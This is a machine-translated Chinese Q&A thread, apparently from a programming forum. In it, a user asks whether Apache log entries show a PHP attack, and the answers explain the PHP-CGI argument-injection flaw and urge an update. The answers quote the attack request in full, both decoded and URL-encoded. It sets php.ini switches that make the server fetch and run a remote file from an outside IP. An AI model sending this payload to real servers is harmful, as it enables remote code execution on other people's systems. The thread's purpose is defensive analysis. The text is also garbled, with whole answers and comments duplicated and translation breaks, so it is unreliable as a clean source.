PHP-这看起来像是黑客攻击吗

很多这些都在我创建404的apache日志中，看起来可能是PHP黑客的尝试

是的

阅读下一页，它解释了一切：

是的

阅读下一页，它解释了一切：

---

在我看来，这确实像是一次黑客尝试

从

一些系统支持向CGI脚本提供字符串数组的方法。这仅在“索引”查询的情况下使用。这由一个“GET”或“HEAD”HTTP请求标识，该请求的URL搜索字符串不包含任何未编码的=字符

URL解码的查询字符串如下所示：

/index.php？-dsafe\u mode=Off-ddisable\u functions=NULL-dallow\u url\u fopen=On-dallow\u url\u include=On-dauto\u prepend\u文件=http://61.19.253.26/echo.txt

这些都是

-d

开关，用于定义

php.ini

指令。基本上，这就是它所改变的：

/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt 

最后，还有

auto\u prepend\u文件=http://61.19.253.26/echo.txt

——该指令包括位于

http://61.19.253.26/echo.txt

并在index.php中的代码之前执行它

echo.txt

托管在泰国某处的web服务器上，包含

。这可能用于检查服务器是否易受攻击

---

如果您使用Apache

mod_cgi

/

mod_cgid

运行5.3.13之前的PHP版本和5.4.3之前的5.4.x立即更新：

，在我看来，这确实像是一次黑客尝试

从

一些系统支持向CGI脚本提供字符串数组的方法。这仅在“索引”查询的情况下使用。这由一个“GET”或“HEAD”HTTP请求标识，该请求的URL搜索字符串不包含任何未编码的=字符

URL解码的查询字符串如下所示：

/index.php？-dsafe\u mode=Off-ddisable\u functions=NULL-dallow\u url\u fopen=On-dallow\u url\u include=On-dauto\u prepend\u文件=http://61.19.253.26/echo.txt

这些都是

-d

开关，用于定义

php.ini

指令。基本上，这就是它所改变的：

/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt 

最后，还有

auto\u prepend\u文件=http://61.19.253.26/echo.txt

——该指令包括位于

http://61.19.253.26/echo.txt

并在index.php中的代码之前执行它

echo.txt

托管在泰国某处的web服务器上，包含

。这可能用于检查服务器是否易受攻击

---

如果您使用Apache

mod_cgi

/

mod_cgid

运行5.3.13之前的PHP版本和5.4.3之前的5.4.x立即更新：

我认为这个问题属于服务器故障。您正在解析这些参数吗？这可能是在cgi模式下攻击PHP的错误尝试，这不是一个经常遇到的配置。我认为这个问题属于服务器故障。您正在解析这些参数吗？这可能是在cgi模式下攻击PHP的错误尝试，而cgi模式不是一个经常遇到的配置。如何检查mod_cgi是否正在运行？如何检查mod_cgi是否正在运行？